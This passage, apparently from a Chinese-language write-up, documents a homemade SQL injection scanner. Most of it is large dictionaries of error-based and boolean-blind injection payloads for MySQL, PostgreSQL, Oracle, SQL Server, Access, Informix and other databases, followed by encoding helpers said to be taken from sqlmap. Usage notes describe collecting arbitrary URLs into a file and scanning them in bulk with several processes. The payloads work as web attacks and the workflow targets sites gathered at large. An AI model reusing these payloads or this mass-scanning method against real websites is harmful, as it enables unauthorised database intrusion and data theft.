{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
'INJPAY_2':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
'INJPAY_3':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
'INJPAY_4':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
'INJPAY_5':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
'INJPAY_6':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
'INJPAY_7':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
'INJPAY_8':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
'INJPAY_9':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
'INJPAY_53':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
'INJPAY_49':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
'INJPAY_48':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)"},
'INJPAY_45':
{'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
'INJPAY_44':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
'INJPAY_47':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)"},
'INJPAY_46':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)"},
'INJPAY_41':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
'INJPAY_40':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
'INJPAY_43':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')"},
'INJPAY_42':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"}
}
通过两步分别加载和验证:
- url链接+前缀+level1_payloads+后缀,访问请求,根据sql_error判断结果
- url链接+前缀+error_base_injection中的payload+后缀,访问请求,根据error_base_injection的grep匹配结果是否成功,就能证明error_base_injection中的dbms数据库类型存在注入
通过查看源码,发现sqlmap会对传入的参数进行编码,需要三个函数和一个设置一个系统默认值编码
UNICODE_ENCODING = "utf8"
# 注入参数字符串编码
def unicodeencode(value, encoding=None):
"""
Returns 8-bit string representation of the supplied unicode value
>>> unicodeencode(u'foobar')
'foobar'
"""
retVal = value
if isinstance(value, unicode):
try:
retVal = value.encode(encoding or UNICODE_ENCODING)
except UnicodeEncodeError:
retVal = value.encode(UNICODE_ENCODING, "replace")
return retVal
def utf8encode(value):
"""
Returns 8-bit string representation of the supplied UTF-8 value
>>> utf8encode(u'foobar')
'foobar'
"""
return unicodeencode(value, "utf-8")
def escaper(value):
retVal = None
try:
retVal = "0x%s" % binascii.hexlify(value)
except UnicodeEncodeError:
retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value))
return retVal
盲注型
第三步是加载盲注的payload,同样整理到字典里面了
'''
正请求payload 负请求comparsion
url1 代表?id=1
url2 代表?id=-100
在url1情况下: 本身页面就是对的
LEVEL 1 代表正请求与原始页面一样,正请求与错误页面不一样,正请求与负请求页面不一样,负请求与原始页面不一样,负请求与错误页面可能一样(有waf就一样) -->存在注入
LEVEL 2 代表正请求与原始页面不一样,正请求与错误页面可能不一样,正请求与负请求页面不一样,负请求与原始页面一样,负请求与错误页面不一样(有waf就一样)
LEVEL 3 代表正请求与原始页面一样,正请求与错误页面不一样,正请求与负请求页面不一样,负请求与原始页面不一样,负请求与错误页面可能一样(有waf就一样)
在url2 情况下:本身页面就是错的
算了先不管这个了
LEVEL 1 代表正请求与原始页面一样,正请求与错误页面可能不一样(有waf就一样),正请求与负请求页面一样,负请求与原始页面不一样,负请求与错误页面可能一样
RANDNUM #随机数字
ORIGVALUE#url中id对应值
RANDNUM1 # 随机数字+1
RANDSTR # 随机字母
RANDNUM2 # 随机数字+2
'''
bool_blind_injection = {
"INJPAY_27":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'dbms': 'Microsoft SQL Server',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'level': '3'},
"INJPAY_26":
{
'comparsion': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
'dbms': 'PostgreSQL',
'payload': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
'level': '3'},
"INJPAY_25":
{
'comparsion': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
'dbms': 'PostgreSQL',
'payload': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
'level': '3'},
"INJPAY_24":
{'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
'dbms': 'PostgreSQL',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
'level': '3'},
"INJPAY_23":
{'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
'dbms': 'PostgreSQL',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
'level': '3'},
"INJPAY_22":
{'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]', 'dbms': 'MySQL',
'payload': ' and ([RANDNUM]=[RANDNUM])*[ORIGVALUE]', 'level': '3'},
"INJPAY_21":
{'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
'payload': ' and ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '3'},
"INJPAY_20":
{'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
'payload': ' and ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
"INJPAY_50":
{'comparsion': ' HAVING [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' HAVING [RANDNUM]=[RANDNUM]',
'level': '1'},
"INJPAY_29":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'dbms': 'Oracle',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'level': '3'},
"INJPAY_28":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'dbms': 'Microsoft SQL Server',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'level': '3'},
"INJPAY_51":
{
'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
'dbms': 'MySQL',
'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
'level': '1'},
"INJPAY_38":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'dbms': 'MySQL',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'level': '1'},
"INJPAY_39":
{'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))',
'dbms': 'PostgreSQL', 'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))',
'level': '1'},
"INJPAY_55":
{
'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
'dbms': 'Microsoft SQL Server',
'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
'level': '1'},
"INJPAY_58":
{'comparsion': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END', 'dbms': 'SAP MaxDB',
'payload': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END', 'level': '1'},
"INJPAY_30":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'dbms': 'Oracle',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'level': '3'},
"INJPAY_31":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
'dbms': 'Informix',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
'level': '3'},
"INJPAY_32":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
'dbms': 'Informix',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
'level': '3'},
"INJPAY_33":
{'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)', 'dbms': 'Microsoft Access',
'payload': ' and IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)', 'level': '3'},
"INJPAY_34":
{'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
'payload': ' and IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '3'},
"INJPAY_35":
{
'comparsion': ' and (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
'dbms': 'MySQL',
'payload': ' and (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
'level': '3'},
"INJPAY_36":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'dbms': 'MySQL',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'level': '1'},
"INJPAY_37":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'dbms': 'MySQL',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
'level': '1'},
"INJPAY_12":
{'comparsion': ' OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
'payload': ' OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '2'},
"INJPAY_13":
{
'comparsion': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
'dbms': 'PostgreSQL',
'payload': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
'level': '1'},
"INJPAY_10":
{'comparsion': ' OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
'payload': ' OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
"INJPAY_11":
{'comparsion': ' AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
'payload': ' AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '1'},
"INJPAY_16":
{
'comparsion': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
'dbms': 'Oracle',
'payload': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
'level': '2'},
"INJPAY_17":
{
'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
'dbms': 'MySQL',
'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
'level': '3'},
"INJPAY_14":
{
'comparsion': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
'dbms': 'PostgreSQL',
'payload': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
'level': '2'},
"INJPAY_15":
{
'comparsion': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
'dbms': 'Oracle',
'payload': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
'level': '1'},
"INJPAY_18":
{'comparsion': ' and MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
'payload': ' and MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
"INJPAY_19":
{'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
'payload': ' and ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '3'},
"INJPAY_52":
{'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)',
'dbms': 'PostgreSQL',
'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)', 'level': '1'},
"INJPAY_56":
{
'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
'dbms': 'Oracle',
'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
'level': '1'},
"INJPAY_57":
{'comparsion': ' ;IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
'payload': ' ;IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
"INJPAY_54":
{'comparsion': ' ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]',
'dbms': 'Microsoft SQL Server',
'payload': ' ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]', 'level': '1'},
"INJPAY_1":
{'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' AND [RANDNUM]=[RANDNUM]',
'level': '1'},
"INJPAY_2":
{'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR [RANDNUM]=[RANDNUM]', 'level': '2'},
"INJPAY_3":
{'comparsion': ' OR NOT [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR NOT [RANDNUM]=[RANDNUM]',
'level': '1'},
"INJPAY_4":
{'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' AND [RANDNUM]=[RANDNUM]',
'level': '1'},
"INJPAY_5":
{'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' OR [RANDNUM]=[RANDNUM]',
'level': '2'},
"INJPAY_6":
{'comparsion': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))',
'dbms': 'MySQL', 'payload': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))',
'level': '1'},
"INJPAY_7":
{'comparsion': ' AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
'payload': ' AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
"INJPAY_8":
{'comparsion': ' OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
'payload': ' OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
"INJPAY_9":
{'comparsion': ' AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
'payload': ' AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
"INJPAY_53":
{
'comparsion': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1',
'dbms': 'PostgreSQL',
'payload': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1',
'level': '1'},
"INJPAY_49":
{'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)', 'dbms': 'SAP MaxDB',
'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)', 'level': '1'},
"INJPAY_48":
{'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)', 'dbms': 'SAP MaxDB',
'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)', 'level': '1'},
"INJPAY_45":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'dbms': 'Oracle',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'level': '1'},
"INJPAY_44":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'dbms': 'Oracle',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
'level': '1'},
"INJPAY_47":
{'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
'payload': ' ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '1'},
"INJPAY_46":
{'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
'payload': ' ,IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
"INJPAY_41":
{
'comparsion': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
'dbms': 'PostgreSQL',
'payload': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
'level': '1'},
"INJPAY_40":
{'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
'dbms': 'PostgreSQL',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
'level': '1'},
"INJPAY_43":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'dbms': 'Microsoft SQL Server',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'level': '1'},
"INJPAY_42":
{
'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'dbms': 'Microsoft SQL Server',
'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
'level': '1'}
}
使用方法
采集一些网址,放在一个文本当中
双击启动主程序,根据提示输入
1. 导入采集文本
2. 设置扫描等级
3. 设置进程数
扫描等级:
level 1 : 简单基于报错的GET/POST注入测试
level 2 : 略复杂的基于报错页面的GET/POST注入测试
level 3 : 复杂的基于报错页面的GET/POST注入测试
level 4 : 复杂的基于BOOL类型的GET/POST盲注测试
